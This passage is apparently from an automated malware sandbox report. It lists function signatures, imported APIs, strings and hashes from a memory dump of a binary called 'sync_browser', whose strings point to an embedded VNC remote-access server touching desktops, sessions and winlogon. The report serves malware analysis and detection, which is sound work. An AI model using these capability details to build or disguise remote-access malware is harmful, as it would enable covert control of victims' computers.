                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$Free$AddressLoadProc
                                                                    • String ID: ($GetMonitorInfoA$MonitorFromPointA$USER32
                                                                    • API String ID: 1386263645-671781545
                                                                    • Opcode ID: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                                    • Instruction ID: 52193b91455b18b1498ae95bb263d88c40b36cffadca0710ecfc90d101a6996e
                                                                    • Opcode Fuzzy Hash: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                                    • Instruction Fuzzy Hash: 4B416A3192C602C6EB6ABF21EA543B8A2A0EF89B58F906130C51D463ECDF7DF4458721
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wgetenv$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: CONNECT_USER$HTTP_PROXY_USER$SOCKS4_USER$SOCKS5_USER$SOCKS_USER
                                                                    • API String ID: 3057866299-2798169553
                                                                    • Opcode ID: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                                    • Instruction ID: 9ab7ea99367f17a2d43337a5e42712441d36ee75df03fe1ad2a52bad244337b2
                                                                    • Opcode Fuzzy Hash: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                                    • Instruction Fuzzy Hash: 0931B521A1EA46D1FE65BB15F4916B8E2A0BF64744FD80435DA0D463BAFF2CFA44C360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close$CreateOpenQueryValueVersion
                                                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                    • API String ID: 1076069355-3579764778
                                                                    • Opcode ID: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                                    • Instruction ID: 5a024607f6efa26522dfd8857109c74c789ab37aff7ec4ac5e1e2bd0a2fdd37f
                                                                    • Opcode Fuzzy Hash: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                                    • Instruction Fuzzy Hash: 69313D76A0CB82C6EB60AB10F4547AAF7A0FB88754FC00135E68D46B69DF7CE119CB10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectfree$CombineCriticalSection$CreateEnterLeaveRect
                                                                    • String ID:
                                                                    • API String ID: 707770685-0
                                                                    • Opcode ID: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                                    • Instruction ID: 1b30cad5605873697cfb957a3301351a1aa8693412ef35533e2683dee4e872c9
                                                                    • Opcode Fuzzy Hash: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                                    • Instruction Fuzzy Hash: F6416F2660CA42C6D650BB29E4842A9B360FBC9BD0F954232EF9E477B9DF3DE504C710
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Global$Free$Unlock$Lock$Allocfree
                                                                    • String ID:
                                                                    • API String ID: 2417228145-0
                                                                    • Opcode ID: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
                                                                    • Instruction ID: a9c5561a187f804a393d87ccd2e56a8e63887b680958f963017e025bc4bfbe3a
                                                                    • Opcode Fuzzy Hash: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
                                                                    • Instruction Fuzzy Hash: 2751F576618B86C5DB50AF26E4942E8B7B0FB98F98F494036CE5D47768DF38E484C720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Combine$DeleteObjectfree$CreateRect
                                                                    • String ID:
                                                                    • API String ID: 3143477926-0
                                                                    • Opcode ID: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                                    • Instruction ID: 836870b7a8dbfab629e5efaf47b9cdf5c821cfe65873702c9fd8fcce3a695630
                                                                    • Opcode Fuzzy Hash: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                                    • Instruction Fuzzy Hash: C741197660CA82D1DA50FB16E4984AAB720FF89BD4F805122EF9E47778DE3CE545C710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$CriticalInitializeSection$_errno_invalid_parameter_noinfo
                                                                    • String ID: 0.0.0$12-12-2002$Plugin.dsm$Someone$Unknown
                                                                    • API String ID: 524037307-261918508
                                                                    • Opcode ID: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                                    • Instruction ID: 44ba466bfd6a5233dd0344cfdc3bf876ab33ec8dcb49cd1c2a2ef414a9da6866
                                                                    • Opcode Fuzzy Hash: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                                    • Instruction Fuzzy Hash: C021CF32518B86D1DB41AF24E9912E8B3ACFF54B48F98413ADA5C4A679DF34A255C320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close$DesktopHandle$CriticalInputLeaveOpenSection
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 4065787043-3977938048
                                                                    • Opcode ID: 91538cf79572d608c44060e02ed68d1d03b17946a78a771c52bf3acdc14f3e48
                                                                    • Instruction ID: 8218c5bc4cc261436d2f25ded140985747c5356badf8ff10ff37733b24f6e94d
                                                                    • Opcode Fuzzy Hash: 91538cf79572d608c44060e02ed68d1d03b17946a78a771c52bf3acdc14f3e48
                                                                    • Instruction Fuzzy Hash: 2EE1B022A0CA81C5E754BB25C448BBEA7A1EB85B94F954239DB5C477F9CF38F840C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$getpeernameinet_ntoamalloc$CloseCurrentDialogInputOpenParam
                                                                    • String ID: <unavailable>$Default
                                                                    • API String ID: 424836046-797050109
                                                                    • Opcode ID: b6dcc162a7e479665caaa1ca1c29d76cb599ba534f3a498a10e17cfeb49c5b9b
                                                                    • Instruction ID: 5e77878f2552ed206590c7e88f83a2681e4cb12b7c2c70b010aa49ccee8e391b
                                                                    • Opcode Fuzzy Hash: b6dcc162a7e479665caaa1ca1c29d76cb599ba534f3a498a10e17cfeb49c5b9b
                                                                    • Instruction Fuzzy Hash: 9E615C2660CA46C2EB60BB25D45427DB3A5FB84F84F844136DE0E4B7B9EF3AE445C320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: WTSEnumerateProcessesA$WTSFreeMemory$winlogon.exe$wtsapi32
                                                                    • API String ID: 145871493-4162899161
                                                                    • Opcode ID: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                                    • Instruction ID: 8519e97832a71098dcc4597b7efa5dafaf06f2f9d779533e7cb68f88aea769b8
                                                                    • Opcode Fuzzy Hash: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                                    • Instruction Fuzzy Hash: B141713660DB45C6E654BF05E8802A9B3A1FB85BA0F944135DE6D077A8EF3DF445C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: Console$WTSEnumerateSessionsA$WTSFreeMemory$wtsapi32
                                                                    • API String ID: 145871493-4083478734
                                                                    • Opcode ID: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                                    • Instruction ID: 5f24d393328aecaa2950b6f4c03727891481b009210c10d63c37090bd73abb01
                                                                    • Opcode Fuzzy Hash: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                                    • Instruction Fuzzy Hash: 56415E32A0DB82C5EA60FF15E84026AA2A5FF85750F980135D96D477A8EF39F464C620
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$FileLoadModuleName$AddressFreeProc_errno_invalid_parameter_noinfo
                                                                    • String ID: LOGFAILED$LOGLOGON$\logging.dll$vncclient.cpp : authentication failed
                                                                    • API String ID: 2822070703-2230024269
                                                                    • Opcode ID: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
                                                                    • Instruction ID: 5902b4471e6261f9776f16d2eaa91736d229ba977ba45388b87a14e85334e547
                                                                    • Opcode Fuzzy Hash: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
                                                                    • Instruction Fuzzy Hash: 3541552561CB85C1EB64FB25E8542A9A7A0FF48790FC44235DA6D43BA9DF3CF504CB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$CloseOpenThread$CurrentInformationInputObjectUser
                                                                    • String ID: vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : OpenInputdesktop2 named$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                                    • API String ID: 82840795-1493190668
                                                                    • Opcode ID: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
                                                                    • Instruction ID: 4581903e48f5a76941e866fb4b775909b01eedaff03a97be61442b8f1adfbb09
                                                                    • Opcode Fuzzy Hash: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
                                                                    • Instruction Fuzzy Hash: F8217C64F1C942C0FB95FB26B9401FA9352BF88784FC84032DA1E86379EE3DF5518A20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
